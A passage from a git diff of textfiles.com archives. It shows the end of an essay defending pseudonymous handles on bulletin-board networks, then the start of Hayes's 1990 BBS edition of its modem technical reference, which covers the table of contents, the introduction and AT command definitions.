terrorize the nets and chill freedoms of +speech and assembly thereon -- have been achieved. + +In this way, sysops and moderators become unwitting +accomplices in the supression of freedom on the networks. +When real name requirements are instituted, anyone who fears +retaliation of any sort, by any group, will have to fear +participation in the nets; hence content is effectively +controlled. This consideration becomes especially important +as the nets expand into even more violent and repressive +countries outside the U.S. + +We must decide whether freedom of information and open +public discussion are in fact among the goals of network +conferencing, and if so, whether handles have a role in +achieving these goals. As access to the networks grows, we +have a rare opportunity to frustrate the efforts of +governments and corporations to control the public mind! In +this way above all others, computers may have the potential +to shape the future of all mankind for the better. + + + + * * * * * + + + + A CALL TO ACTION + ---------------- + + + The move to electronic communication may be a turning + point that history will remember. Just as in + seventeenth and eighteenth century Great Britain and + America a few tracts and acts set precedents for + print by which we live today, so what we think and do + today may frame the information system for a + substantial period in the future. + [Ithiel de Sola Pool, "Technologies of Freedom", 1983] + + +There was a time when anybody with some gear and a few +batteries could become a radio broadcaster -- no license +required. There was a time when anyone with a sense of +adventure could buy a plane, and maybe get a contract to +carry mail. Those early technological pioneers were +probably unable to imagine the world as it is today, but +their influence is strongly felt in current laws, +regulations and policies with roots in the traditions and +philosophies they founded and shaped. + +Today the new pioneers are knitting the world together with +computers, and the world is changing faster than ever. Law +and ethics are scrambling to keep up. How far will this +growth take us? No one can say for sure. But you don't +need a crystal ball to see that computer communications has +the potential to encompass and surpass all the functionality +of prior media -- print, post, telegraph, telephone, radio +and television -- and more. It seems reasonable to assume +that computer communications will be at least as ubiquitous +and important in the lives of our grandchildren as all the +older media have been in ours. + +It will be a world whose outlines we can now make out only +dimly. But the foundations of that world are being built +today by those of us exploring and homesteading on the +electronic frontier. We need to look hard at what it will +take to survive in the information age. + +In this article we have attempted to show, for one very +narrow issue, what some of the stakes may be in this future- +building game. But the risks associated with exposing your +name in a computer conference are not well defined, and +various people will no doubt assess the importance of these +risks differently. After all, most of us take risks every +day which are probably greater than the risks associated +with conferencing. We drive on the expressway. We eat +sushi. To some people, the risks of conferencing may seem +terrifying; to others, insignificant. + +But let us not get side-tracked into unresolvable arguments +on the matter. The real issue here is not how dangerous +conferencing may or may not be; it is whether you and I will +be able to make our own decisions, and protect ourselves (or +not) as we see fit. The obvious answer is that users must +exercise their collective power to advance their own +interests, and to pressure sysops and moderators to become +more sensitive to user concerns. + +To help in that effort, we would like to recommend the +following guidelines for user action: + + -- Bear in mind John Perry Barlow's observation that + "Liberties are preserved by using them". Let your + sysop know that you would prefer to be using a + handle, and use one wherever you can. + + -- Try to support boards and conferences which allow + handles, and avoid those which don't. + + -- When using a handle, BEHAVE RESPONSIBLY! There will + always be irresponsible users on the nets, and they + will always use handles. It is important for the + rest of us to fight common anti-handle prejudices by + showing that handles are NOT always the mark of an + irresponsible user! + + -- Educate others about the importance of handles (but + NEVER argue or flame anyone about it). + +To sysops and moderators: We ask you to bear in mind that +authority is often used best where it is used least. Grant +users the right to engage in any harmless and responsible +behaviors they choose. Protect your interests in ways which +tread as lightly as possible upon the interests of others. +The liberties you preserve may be your own! + +In building the computer forums of today, we are building +the social fabric of tomorrow. If we wish to preserve the +free and open atmosphere which has made computer networking +a powerful force, while at the same time taking care against +the risks inherent in such a force, handles seem to be a +remarkably harmless, entertaining and effective tool to help +us. Let's not throw that tool away. + + +---------------------------------------------------------------------- + diff --git a/textfiles.com/computers/hayes.txt b/textfiles.com/computers/hayes.txt new file mode 100644 index 00000000..67198d44 --- /dev/null +++ b/textfiles.com/computers/hayes.txt @@ -0,0 +1,6481 @@ + + + + +Technical Reference +for +Hayes(TM) Modem Users + +2 November 1990 +Version 1.0 + + + + + + + + + + + + + + + +Hayes Microcomputer Products, Inc. +P.O. Box 105203 +Atlanta, Georgia 30348 + +Europe Office +Hayes Microcomputer Products, Inc. +1 Roundwood Avenue, Stockley Park +Uxbridge, Middlesex UB11 1AE United Kingdom + +Asia Office +Hayes Microcomputer Products, Inc. +21/F Caxton House, 1 Duddell Street +Central Hong Kong + Notice: Hayes Microcomputer Products, Inc. (Hayes) provides the information +contained in this document to you for your convenience. Hayes does not +guarantee the accuracy of the information and reserves the right to change +this document, as well as the hardware and software products described herein +at any time without notice. The Hayes Standard AT Command Set is proprietary +to, and subject to the copyrights of Hayes Microcomputer Products, Inc., and +distribution of this document in no way represents a waiver of those rights. + +Hayes, the Hayes logos, Smartcom, Smartcom II, Smartcom III, Smartcom EZ, +V-series, Smartmodem, ULTRA, and ESP are trademarks of Hayes Microcomputer +Products, Inc. + +Other trademarks identified in this document are trademarks of their +respective companies. + + + + + +Note: This version of the "Technical Reference for Hayes Modem Users" is a +special version edited for bulletin-board downloading. As a plain ASCII +character file, it therefore cannot contain any of the illustrations and +graphic elements provided in the printed version. + +To highlight the start of Chapters, 1st Level Heads, 2nd Level Heads, +3rd Level Heads and Tables, we've used the following scheme: + +Chapters are preceded by: +============================================================================= + +1st Level Heads are preceded by: +***************************************************************************** + +2nd Level Heads are preceded by: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +3rd Level Heads are preceded by: +............................................................................. + +Table heads are separated from table listings by: +----------------------------------------------------------------------------- + + +Document 44-00012 AA K10 (BBS Version) + + +© 1990 Hayes Microcomputer Products, Inc. All rights reserved. + + + +Table of Contents +Chapter One: The Hayes Standard AT Command Set + +1.1 AT Command Listing + A - Answer Command + B - Select Communication Standard + C - Carrier Control Selection + D - Dial Command (and dial modifiers) + E - Command State Character Echo Selection + F - On-line State Character Echo Selection + H - Hook Command Options + I - Internal Memory Tests + L - Speaker Volume Level Selection + M - Speaker On/Off Selection + N - Negotiation of Handshake Options + O - On-Line Command + P - Select Pulse Dialing Method + Q - Result Code Display Options + Sr= - Write to an S-Register + Sr? - Read an S-Register + T - Select Tone Dialing Method + V - Result Code Format Options + W - Negotiation Progress Message Selection + X - Call Progress Options + Y - Long Space Disconnect Options + Z - Soft Reset Command + &B - V.32 Auto Retrain Options + &C - Data Carrier Detect Options + &D - Data Terminal Ready Options + &F - Recall Factory Profile + &G - Guard Tone Selection + &J - Jack Type Selection (Auxiliary Relay Options) + &K - Local Flow Control Options + &L - Line Type Selection (Dialup/Leased) + &O - PAD Channel Selection + &Q - Communications Mode Options + &R - RTS/CTS Options + &S - Data Set Ready Options + &T - Test Options + &U - Trellis Coding Options + &V - View Configuration Profiles + &W - Write Active Profile to Memory + &X - Synchronous Transmit Clock Source + &Y - Select Stored Profile For Hard Reset + &Zn=x - Store Telephone Number + +1.2 Result Code Listing + 1.2.1 Command Response and Call Progress Monitoring + 0 - OK + 1 - CONNECT + 2 - RING + 3 - NO CARRIER + 4 - ERROR + 5 - CONNECT 1200 + 6 - NO DIALTONE + 7 - BUSY + 8 - NO ANSWER + 10 - CONNECT 2400 + 11 - CONNECT 4800 + 12 - CONNECT 9600 + 14 - CONNECT 19200 + 22 - CONNECT 1200/75 + 23 - CONNECT 75/1200 + 28 - CONNECT 38400 + 1.2.2 Negotiation Progress Messages + 40 - CARRIER 300 + 44 - CARRIER 1200/75 + 45 - CARRIER 75/1200 + 46 - CARRIER 1200 + 47 - CARRIER 2400 + 48 - CARRIER 4800 + 50 - CARRIER 9600 + 66 - COMPRESSION: CLASS 5 + 67 - COMPRESSION: V.42BIS + 68 - COMPRESSION: ADC + 69 - COMPRESSION: NONE + 70 - PROTOCOL: NONE + 71 - PROTOCOL: ERROR-CONTROL/LAP-B + 72 - PROTOCOL: ERROR-CONTROL/ LAP-B/HDX + 73 - PROTOCOL: ERROR-CONTROL/LAP-B/AFT + 74 - PROTOCOL: X.25/LAP-B + 75 - PROTOCOL: X.25/LAP-B/HDX + 76 - PROTOCOL: X.25/LAP-B/AFT + 77 - PROTOCOL: LAP-M + 78 - PROTOCOL: LAP-M/HDX V.42 + 79 - PROTOCOL: LAP-M/AFT + 80 - PROTOCOL: ALT + 91 - AUTOSTREAM: LEVEL 1 + 92 - AUTOSTREAM: LEVEL 2 + 93 - AUTOSTREAM: LEVEL 3 + 1.2.3 Information Text (INFO-TEXT) + +1.3 S-Register Listing + S0 - Ring to Answer After + S1 - Ring Count + S2 - Escape Sequence Character + S3 - Carriage Return Character + S4 - Line Feed Character + S5 - Backspace Character + S6 - Wait Before Blind Dialing + S7 - Wait for Carrier after Dialing + S8 - Duration of Delay for Comma Dial Modifier + S9 - Carrier Detect Response Time + S10 - Delay Between Lost Carrier and Hang Up + S11 - Multi-Frequency Tone Duration + S12 - Escape Sequence Guard Time + S18 - Modem Test Timer + S25 - DTR Detection + S26 - RTS to CTS Interval + S30 - Inactivity Time-out + S33 - AFT Options + S36 - Negotiation Failure Treatment + S37 - Desired DCE Line Speed + S38 - Delay Before Forced Hang up + S44 - Asynchronous Framing Technique Selection + S46 - Error-Control Protocol Selection + S48 - Enabling/Disabling Feature Negotiation + S49 - ASB buffer size lower limit + S50 - ASB buffer size upper limit + S53 - Global PAD Configuration + S63 - Leased line carrier level + S69 - Link Layer Window Size + S70 - Maximum Number of Retransmissions + S71 - Link Layer Time-out + S72 - Loss of Flag Idle Time-out + S73 - No Activity Time-out + S74, S75 - Minimum Incoming Logical Channel Number (LCN) + S76, S77 - Maximum Incoming Logical Channel Number (LCN) + S78, S79 - Outgoing Logical Channel Number (LCN) + S80 - Packet Layer N20 Parameter + S81 - Packet Layer T20 Parameter + S82 - Break Signaling Technique + S84 - Adaptive start up negotiation (ASU) + S85 - ASU Negotiation Report + S86 - Connection Failure Cause + S92 - MI/MIC Options + S93 - V.25bis DTE interface speed + S94 - Command Mode Selector + S95 - Negotiation Message Options +1.4 Additional Command Set Definitions + AT - Command Prefix + +++ - Escape Sequence + - End-of-line Character + A/ - Repeat Last Command + + +Chapter Two: V-series(TM) X.25 Communications + +2.1 Modem Configuration for X.25 Communications + 2.1.1 Controlling Automatic Feature Negotiation + 2.1.2 PAD Channel Selection +2.2 PAD Configuration + 2.2.1 PAD Commands + ACC - Accept Call Command + CALL - Call Command (and Call Facilities) + CHAN - Channel Selection Command + CLR - Clear Channel Command + EXEC - Execute String Command + EXIT - Exit PAD Command + INT - Interrupt Command + PAR? - Read Parameter Command + PROF - PAD Profile Command + RESET - PAD Reset Command + RPAR? - Read Remote PAD Parameter Command + RSET - Set Remote PAD Parameter Command + STAT - Status of Current Channel Command + SET - Set PAD Parameter Command + 2.2.2 PAD Parameters + Parameter 1 - PAD Recall Using a Character + Parameter 2 - Echo + Parameter 3 - Selection of Data Forwarding Signal + Parameter 4 - Selection of Idle Timer Delay + Parameter 5 - Ancillary Device Control + Parameter 6 - Control of PAD Result Codes + Parameter 7 - Action on Receipt of Break from Terminal + Parameter 8 - Discard Output + Parameter 9 - Padding after Carriage Return + Parameter 10 - Line Folding + Parameter 11 - Terminal Speed + Parameter 12 - Flow Control of the PAD by Local Terminal + Parameter 13 - Line Feed Insertion after Carriage Return + Parameter 14 - Line Feed Padding + Parameter 15 - Editing + Parameter 16 - Character Delete + Parameter 17 - Line Delete + Parameter 18 - Line Display + Parameter 19 - Editing PAD result codes + Parameter 20 - Echo Mask + Parameter 21 - Parity Treatment + Parameter 22 - Page Wait + National Parameter 70 - Streaming Data Forwarding + National Parameter 71 - Character Format + National Parameter 72 - Break Signal Timing + National Parameter 73 - Break Signal Duration + National Parameter 74 - Disable PAD Parameter by the Remote PAD + National Parameter 100 - Default Maximum Packet Size + National Parameter 101 - Default Maximum Window Size + National Parameter 103 - Reset Request Response Timer + National Parameter 104 - Clear Request Response Timer + National Parameter 105 - Interrupt Response Time + National Parameter 106 - Reset Request Retransmission Counter + National Parameter 107 - Clear Request Retransmission Counter + National Parameter 108 - Channel Allocation Parameter +2.3 PAD Profiles + Factory-Set Profile + CCITT Simple Standard Profile + CCITT Transparent Standard Profile + Error-Control/LAP-B Profile +2.4 Typical X.25 Scenarios + + +Appendix A: Communication Options + +A.1 Transmission and DTE Types + A.1.1 Asynchronous Transmissions + A.1.2 Synchronous Transmissions +A.2 Communication Modes - &Q + A.2.1 Asynchronous Mode - &Q0 + A.2.2 Synchronous Mode 1: sync/async - &Q1 + A.2.3 Synchronous Mode 2: stored number dial - &Q2 + A.2.4 Synchronous Mode 3: manual dial with data/talk switch- &Q3 + A.2.5 Synchronous Mode 4: Hayes AutoSync - &Q4 + A.2.6 Error-Control Mode - &Q5 + A.2.7 Asynchronous Mode with Automatic Speed Buffering (ASB) - &Q6 + +Appendix B: Troubleshooting Tips + +B.1 The Communication Link +B.2 Troubleshooting the Process + B.2.1 Problems in Getting Started + B.2.2 Problems Encountered During Communications +B.3 Special Environment Considerations + B.3.1 Custom Modem Setup for Mainframe or Minicomputer Host + B.3.2 Custom Modem Setup for Telephone System Requirements +B.4 Using AT Commands to Test Modem Circuits + B.4.1 Available Tests + B.4.2 Performing a Test + B.4.3 Testing with Analog Loopback + B.4.4 Testing with Digital Loopback + B.4.5 Testing the Tone Dialer - &T2 +B.5 Testing the Cable + B.5.1 Cable Quality + B.5.2 Checking Cable Signals - &T19 +B.6 Testing Internal Memory + +Appendix C: Modem-to-DTE Interface + +C.1 EIA 232-D/CCITT V.24 Interfaces +C.2 Signals Used in the EIA 232-D Interface +C.3 EIA 232-D Signal Definitions +C.4 Modem Interface Connector + + +Appendix D: Modem Application Development + +D.1 Modem Identification +D.2 Result Code Recognition +D.3 Modem Preparation + D.3.1 Reset + D.3.2 Setup +D.4 Connect Processing + D.4.1 Originating a Call + D.4.2 Answering a Call + D.4.3 Using the CD Line + D.4.4 Aborting a Connect Request +D.5 Carrier Loss Detection + D.5.1 Using the CD Line + D.5.2 Scanning the Incoming Data Stream +D.6 Escape and Hang Up + D.6.1 Escaping the Modem to Command State + D.6.2 Using DTR to Escape or Hang Up +D.7 Modem Re-configuration +D.8 Timing Considerations + D.8.1 Programming for Time + D.8.2 When to Consider Time + D.8.3 Recovering When "Out of Sync" +D.9 General Tips and Techniques + +Index + + +============================================================================= + +Introduction + +This Technical Reference for Hayes Modem Users offers additional information +about the Hayes Standard AT Command Set for users who want to use the command +set to control the modem, rather than using full-featured software. To help +you do this, the complete command set is defined in greater detail than that +provided on the AT Command Set Reference Card that accompanied your modem. All +of the commands in the set are included in this document. + +You'll also find additional discussions on some of the more complicated +options, such as synchronous communications, and the interactions between +communication standards, negotiation commands, and modem speeds. In addition, +information about the connections between the modem and the DTE (computer or +terminal) is included. + +With the information provided here, you should be able to configure your modem +with AT commands for a variety of communication environments. If you are just +starting out with communications programming, this reference should provide +you with sufficient tips to address the modem's features through a software +program of your own. + +If this reference seems more technically oriented than you anticipated, we +suggest that you purchase one of Hayes Smartcom Products. Any of these fine +programs will fully control the modem for almost any telecommunication +requirements. + +***************************************************************************** +Who Should Use this Reference + +Users of full-featured communications software such as Hayes Smartcom Products +will not need this reference. + +This reference is provided for... + +* users of communications software packages which require the user to enter + modem configuration strings. + +* users who will be installing and operating Hayes modems in a non-PC + environment. + +* users who control their modems directly with terminal emulation software. + +* technical personnel responsible for custom installations and applications. + +Additional information is available for communications software developers. If +you are, or would like to become, a registered Hayes Software Developer, you +may receive additional technical material on Hayes products. For information +on qualification and registration procedures, contact your nearest Hayes +Customer Service facility. (Refer to the Customer Service Information folder +provided with your modem for location and telephone number.) + +***************************************************************************** +How this Reference is Organized + +This reference is divided into two chapters and four appendices: + +Chapter One: The Hayes Standard AT Command Set... +includes definitions of the Hayes AT Command Set including the commands, +result codes, and S-registers. + +Chapter Two: V-series(TM) X.25 Communications... +includes definitions of the commands used for X.25 packet switched +communications, PAD and National Parameters, and listings for four PAD +profiles. + +Appendix A: Communication Options... +describes the various asynchronous and synchronous transmission modes +supported by Hayes modems and includes a discussion of the AT commands related +to these modes. + +Appendix B: Troubleshooting Tips... +provides special environmental considerations and offers suggestions for +remedying problems in modem communications. + +Appendix C: Modem-to-DTE Interface... +discusses the requirements and capabilities of the modem's data terminal +equipment (DTE) interface. + +Appendix D: Modem Application Development... +offers suggestions for developing applications software using the AT command +set. + +***************************************************************************** +How to Use this Reference + +The commands and procedures described in this reference are intended for use +with a program that provides a command line interface to the modem. or if the +modem is connected to an asynchronous terminal to which commands can be +entered and sent through the serial port to the modem. Although commands are +not required when using Hayes Smartcom(TM) products, Smartcom EZ(TM), Smartcom +II(TM), and Smartcom III(TM) all support a command line interface to the +modem. Refer to the Smartmodem Product User's Reference or V-series System +Product User's Reference (depending on the modem you purchased) for +descriptions of the features that are enabled by the AT Commands and S- +Registers defined here. These user's references both explain how to issue AT +Commands, and read and set S-Registers/PAD Parameters. + +Please note that this reference is not a list of the features supported by +your modem, but a general guide to the Hayes AT Command Set as used to control +Hayes modems. For a list of features supported by your modem, refer to the +documentation included with your modem. This Modem Technical Reference is a +supplement to the documentation provided with your modem, not a replacement. + +============================================================================= + +Chapter One: +The Hayes Standard AT Command Set + +This chapter is divided into three sections: AT commands, Result Codes, and S- +Registers. The first section defines individual AT commands. Commands are +listed in alphabetically for easy reference. The second section defines the +Result Codes that can be returned by Hayes modems. These are listed in numeric +order. The third section defines Hayes Smartmodem Registers. These, too, are +in numeric order. For completeness, definitions of the AT command prefix, the +end-of-line character, and other information related to the Hayes Standard AT +Command Set are also included. + +For the factory setting and available options/ranges for commands and +registers, use the AT Command Set Reference Card provided with your modem. +Unless a command, register, or result code is listed on this card, it is not +supported by your modem, although it appears in this document. + + +***************************************************************************** +1.1 AT Command Listing +Each step in the evolution of Hayes modems has added to the feature set that +has enhanced the definition of the Hayes standard. The diagram below shows the +major steps in the process. + +A - Answer Command +The A command instructs the modem to go off hook and respond to an incoming +call, then handshake with the remote modem. When the modem returns the RING +result code, issue ATA. The modem will send an answer carrier signal to +the originating modem and wait for an originate carrier signal. When the modem +receives the carrier from the originating modem, the modems go through a +handshaking process then go on-line. The modems return the CONNECT XXXXX +result code. If no carrier signal is received within the time specified in +Register S7, the modem hangs up, returns the NO CARRIER result code, and +enters the command state. + +B - Select Communication Standard +The B command is used to specify the desired communications standard setting +at a particular modem line speed. Because options can select between groups of +options, more than one combination of communication standard and speed can be +selected. For example, you can issue B1 and B16; both will be in effect +because they do not reference the same line speed. However, choosing B1 then +B5 selects B5, and replaces B1 as the standard for 1200 bps communications. +The most recent selection chosen from any given group will be in effect for +that parameter group. + +GROUP 1 +Values Description +----------------------------------------------------------------------------- +0 or none V.22 when modem is at 1200 bps +1 U. S. Domestic 212A when modem is at 1200 bps +2 V.23 R1200/T75 bps ASB when modem is at T1200/R1200 bps +3 V.23 T1200/R75 bps ASB when modem is at T1200/R1200 bps +4 V.23 T1200/R75 bps split speed when modem is at T1200/R75 bps +5 V.23 1200 bps half duplex when modem is at T1200/R1200 bps + + +GROUP 2 +Values Description +----------------------------------------------------------------------------- +10 V.23 R1200/T75 bps split speed when modem is at R1200/T75 bps +11 U. S. Domestic 212A when modem is at 1200 bps + + +GROUP 3 +----------------------------------------------------------------------------- +Values Description +15 V.21 when modem is 110/300 bps +16 U. S. Domestic 103 when modem is at 110/300 bps + + +GROUP 4 +----------------------------------------------------------------------------- +Values Description +20 V.23 R600/T75 bps ASB when modem is T600/R600 bps +21 V.23 T600/R75 bps ASB when modem is T600/R600 bps +22 V.23 T600/R75 bps split speed when modem is T600/R75 bps +23 V.23 600, half duplex when modem is 600 bps + + +GROUP 5 +----------------------------------------------------------------------------- +Values Description +30 V.22bis when modem is 2400 bps +31 V.27ter when modem is 2400 bps + + +GROUP 6 +----------------------------------------------------------------------------- +Values Description +40 V.27ter when modem is 4800 bps +41 V.32 full duplex when modem is 4800 bps +42 V.32 half duplex when modem is 4800 bps +44 V.23 half duplex when modem is 4800 bps + +GROUP 7 +----------------------------------------------------------------------------- +Values Description +50 V.29 HDX when modem is 7200 bps + + +GROUP 8 +----------------------------------------------------------------------------- +Values Description +60 V.32 full duplex when modem is 9600 bps +61 V.32 half duplex when modem is 9600 bps +63 V.29 half duplex when modem is 9600 bps + +C - Carrier Control Selection +The C command is used by some Hayes modems, such as Smartmodem 1200, to +control the transmit carrier. In these instances, C0 instructs the modem not +to send carrier (i.e., puts modem in a receive-only mode). High-speed modems +(those capable of speeds greater than 1200 bps) accept C1 without error in +order to assure backward compatibility with communications software that +issues C1. However, these modems do not support C0. + +C0 - Transmit carrier always off (not supported in high-speed modems) + +C1 - Normal transmit carrier switching + +D - Dial Command +The D command places the modem in originate mode; it then functions as an +auto-dialer. Whether the command is issued on a line by itself, or followed +immediately by the telephone number, it must be preceded by the AT prefix and +terminated with a The dial string is a combination of dial digits and +dial modifiers. If the modem is off hook, it will neither initially wait nor +attempt to detect dial tone before proceeding. The D command is not valid when +the modem is on-line or if either &Q2 or &Q3 is in effect. Parentheses and +hyphens in a dial string are ignored by the auto-dialer, but are counted as +characters in the 255-character command buffer. + + +Result Codes Description +----------------------------------------------------------------------------- +BUSY If X3 or X4 are selected or W dial modifier is used and busy + is detected + +NO DIALTONE If X2 or X4 are selected and 1 second of dial tone is not + detected within 5 seconds If W dial modifier is processes and + then 3 seconds of dial tone is not detected within the time + specified by S7 + +ERROR If the S=n dial modifier is processed and the n value is out + of range (refer to the S dial modifier in this section) or if + the total number of characters in the command line plus the + stored dial string exceeds 255 characters + +NO ANSWER If @ dial modifier is used and then no signal is detected + for at least five continuous seconds before the time + specified by S7 + +OK If aborted by DTR ON-to-OFF whenever certain combinations of + &D and &Q are in effect. Refer to the &D command in this + chapter for details. If the ; dial modifier is processed in + the dial string. If aborted by a character from the DTE + during the dialing process + +Dial Modifiers +Dial modifiers can be combined with the dial (D) command to perform a series +of operations within a single command line. For example, +ATDT9W1552368!@#71234; instructs the modem to use tone dialing to access +a number outside a PBX, wait for dial tone, dial the number 1552368, enter a +timed break recall, wait for quiet answer, and issue the PBX transfer code #7 +before dialing extension number 1234, then return to the command state before +initiating the handshake. + +0-9 A B C D # * - Digits/Characters for Dialing +The digits/characters 0-9 A B C D # * are used to specify what numbers the +modem will dial. The characters A B C D # * represent specific tone pairs and +therefore can be used only when tone dialing is selected; these symbols are +ignored when pulse dialing is used. + +P - Pulse Dialing Method +The P dial modifier selects the pulse method of dialing. The P modifier can be +issued with the dial command, or alone, to indicate the method used for +subsequent dialings. The factory-set method is pulse. Once this method is +selected, it is used until the other is chosen, or the modem is reset. + +T - Tone Dialing Method +The T dial modifier selects the tone method of dialing. The T modifier can be +issued with the dial command, or alone, to indicate the method used for +subsequent dialings. Once this method is selected, it is used until the other +is chosen, or the modem is reset. + +W - Wait for Second Dial Tone +The W dial modifier instructs the modem to wait for dial tone before +proceeding. If dial tone detection is not completed within the preset time +limit, the modem hangs up and returns the NO DIALTONE result code. Some PBXs +do not return a secondary proceed indication (second dial tone). The W dial +modifier is not effective in such systems and should not be used. + +, - Delay Processing of Next Character +The comma (,) dial modifier in a dial string causes the modem to pause before +processing the next character or symbol in the command line. The duration of +the pause is determined by the value held in Register S8. The comma is +frequently inserted after the 9 (digit generally used to gain outside access +from a PBX) to allow sufficient time for the dial tone to occur before the +modem dials the telephone number. + +@ - Wait for Quiet Answer +The @ dial modifier instructs the modem to listen for five seconds silence +before continuing. The number of seconds the modem waits for silence is +determined by the value held in S7. This modifier is useful when dialing +telephone systems that produce no dial tone. If a five-second silence has not +been detected within the period set in S7, the modem hangs up and returns the +NO ANSWER result code. If it detects the five seconds of silence, the modem +processes the remaining characters in the dial string. Note that the modem +does not listen for silence until it first detects dial tone and some other +signal, such as a ringing signal, that lasts longer than 210 milliseconds. For +example, to dial 1552368, wait for a quiet answer, then dial a security code +85939, wait for a second dial tone, and dial extension 423 you would issue the +following command: ATDT 1552368 @ 85939 W 423 . + +! - Timed Break Recall (Hookflash) +The ! dial modifier issues a timed break recall signal, which causes the modem +to hang up for 75 milliseconds, then reconnect. This feature can be used to +access such PBX features as call transfer. + +; - Return to Command State after Dialing +The semicolon (;) dial modifier, used only at the end of a command line (just +before the ), instructs the modem to return to the command state +immediately after dialing, without breaking the connection. + +The ; is useful when calling an electronic service, such as that offered by a +bank, that permits you to use tones to transmit numbers once a connection has +been established. The modem can send tones even if your telephone cannot. The +example below illustrates the use of the semicolon modifier in communications +with an electronic banking service. + +ATDP 1552368; Dials bank using pulse method + +OK Command executed, but keeps the modem in command state (no carrier +handshake takes place) + +ATDT 4768; Sends an ID code via tones and maintains modem in command +state. + +OK Modem in command state; command executed. + +In this example, the ; differs from the +++ in that the escape sequence places +the modem in the command state only when two modems have completed a +handshake. The semicolon keeps the modem in command state; no CONNECT XXXXX +result code is displayed. + +DS=n - Dialing a Stored Telephone Number +A stored number can be dialed from an asynchronous terminal by following the +dial (D) command with the S modifier, an equal sign, and the location of the +stored number (see &Zn=x command at the end of this section). The format of +the modifier is S=n, where n is location 0-3. If ATDS=2 were issued, for +example, the modem would dial the string stored in memory location three of +its "telephone book." + +R - Originate a Call in Answer Mode +The dial modifier R (Reverse mode) enables the modem to dial an originate- +only modem by placing a call in answer mode. This modifier must be entered at +the end of the dialling (D) command string, before the . +The R modifier directs the modem to act as if it had been sent an A command in +that part of the command string. + +E - Command State Character Echo Selection +The E command determines whether characters are echoed to the DTE from the +modem when it is command state. Some computers and terminals do not send the +characters you type to the screen; they only transmit them to the remote +system through the serial port. In this case, if Command State character echo +were not enabled by the modem, you would be unable to see what you type. If +the DTE does echo the characters you type in command state, and this function +is enabled in the modem, each character typed will appear twice. + +E0 Command state character echo disabled + +E1 Command state character echo enabled + + +F - On-line State Character Echo Selection +The F command is used by some Hayes modems, such as Smartmodem 1200, to +determine whether characters are echoed to the DTE from the modem when it is +in the on-line state. High-speed Hayes modems do not support the F0 option. +However, because the F command may be issued by older communications software, +F! is supported to assure backwards compatibility. + +F0 On-line character echo enabled (where not supported, ERROR result code is +returned) + +F1 On-line character echo disabled + +H - Hook Command Options +The H command provides control over the line relay. Its most common use is +with the H0 option to initiate the Hangup Process and place the modem on +hook.H1 takes the modem off hook. + +H0 Execute the Hangup process if in the "on-line" command state or the local +analog loopback and analog loopback selftest conditions + +H1 Go off hook; do not execute the Handshake Process + + +I - Internal Memory Tests +The various forms of the I command instruct the modem to query its memory for +information about itself. the results of these tests are frequently used by +programmers for the purpose of determining compatibility with software. +Because these commands request information about the modem's firmware, they +are not run when a connection has been established with a remote modem. + +I0 - display product code +This option reports the product code of the modem to the DTE. The modem +produces information text dependent upon its highest DCE line speed. The +responses below are examples: + +Result Codes..Description +----------------------------------------------------------------------------- + 300 Smartmodem 300(TM) + + 120 Smartmodem 1200(TM), Smartmodem 1200B(TM), + Smartmodem 1200C(TM), Smartmodem 1200A(TM) + + 240 Smartmodem 2400(TM), Smartmodem 2400B(TM), + Smartmodem 2400P(TM), Smartmodem 2400Q(TM), + Smartmodem 2400M(TM), V-series Smartmodem 2400, + V-series Smartmodem 2400B, + V-series Smartmodem 2400P, + V-series Smartmodem 2400M + + 960 Smartmodem 9600, V-series Smartmodem 9600(TM), + V-series Smartmodem 9600B(TM), + V-series Smartmodem 9600P(TM), + V-Series ULTRA Smartmodem 9600 + +I1- display ROM checksum +The I1 command instructs the modem calculate the value of the ROM checksum. +The response is a 3-digit decimal information text, the sum of all of the +bytes in ROM. + +I2 - perform ROM checksum test +This command instructs the modem to verify the ROM checksums. Depending on +whether the ROM checksum has been found to be correct, the modem produces an +info text that resembles a verbose result code. The modem memory test compares +the ROM checksum and tests it against the correct sum, also stored in ROM. +Rather than returning a value in the way the I1 one command does, the I2 +command generates a result code. When the checksum is valid, the response is: +OK. When the ROM checksum fails, the modem responds with ERROR. + +I4 - identify product features +The capabilities and features of the modem are encoded into a string of info- +text that consists of several strings that are ASCII character representations +of hex numerals which are bit-mapped. The first character of each string +identifies which bit maps are in that string. For example, the "a-string" +starts with a lower case "a" and identifies most of the basic modem +capabilities such as modulation standards supported and support for AutoSync. + +Since the following tables identify features for Hayes modem products, the +values included here are subject to change and expansion. + +The I4 info-text displayed: + +a097800C204C264 bF60410000 +r1031111111010000 r3000111010000000 + +surrounded by additional and characters as are required by the V +command option in effect. According to convention, all and +characters are defined by S3 and S4, respectively. The meanings of the a, b, +r1, and r3 strings currently defined are described below. + +I4 "a" String.. +The first string, the a-string, is encoded by characters, hex symbols +following the "a" character, each of which represents four bits. + +a D1 D2 D3 D4 D5 D6 D7 D8 D9 D10 D11 D12 D13 D14 D15 D16 D17 D18 + + +D1, D2 Reserved +D3 Bit 3: Indicates modem based on SM1200FE commands + Bit 2: Indicates modem based on SM2400 commands + Bit 1: Indicates that modem supports &J commands + Bit 0: Indicates that modem supports &L commands +D4 Bit 3: Indicates that modem supports AutoSync (&Q4) +D5 Bit 3: Plug-in board modem product + Bit 2: Stand alone modem product + Bit 1: Supports &H0 through &H4 + Bit 0: Supports &I0 through &I4 +D7 Bit 3: Supports V.22 at 1200 bps + Bit 2: Supports Bell 212A + Bit 1: Supports ASB (&Q6) in V.23 75xmt/1200rcv + Bit 0: Supports ASB (&Q6) in V.23 1200xmt/75rcv +D8 Bit 3: Supports V.23 1200xmt/75rcv + Bit 2: Supports V.23 1200 half duplex + Bit 1: Supports V.23 75xmt/1200rcv + Bit 0: Supports V.23 75xmt/600rcv +D9 Bit 3: Supports V.21 100/300 + Bit 2: Supports ASB (&Q6) in V.23 75xmt/600rcv + Bit 1: Supports ASB (&Q6) in V.23 600xmt/75rcv + Bit 0: Supports V.23 600xmt/75rcv +D10 Bit 2: Supports V.22bis at 2400 bps + Bit 1: Supports V.27ter at 2400 bps + Bit 0: Supports V.27ter at 4800 bps +D11 Bit 3: Supports V.32 full duplex at 4800 bps + Bit 2: Supports V.32 half duplex at 4800 bps + Bit 1: Supports (Reserved) at 4800 bps + Bit 0: Supports V.29 half duplex at 4800 bps +D12 Bit 3: Supports V.29 half duplex at 7200 bps + Bit 2: Supports V.32 full duplex at 9600 bps + Bit 1: Supports V.32 half duplex at 9600 bps + Bit 0: Supports (Reserved) at 9600 bps +D13 Bit 3: Supports V.29 half duplex 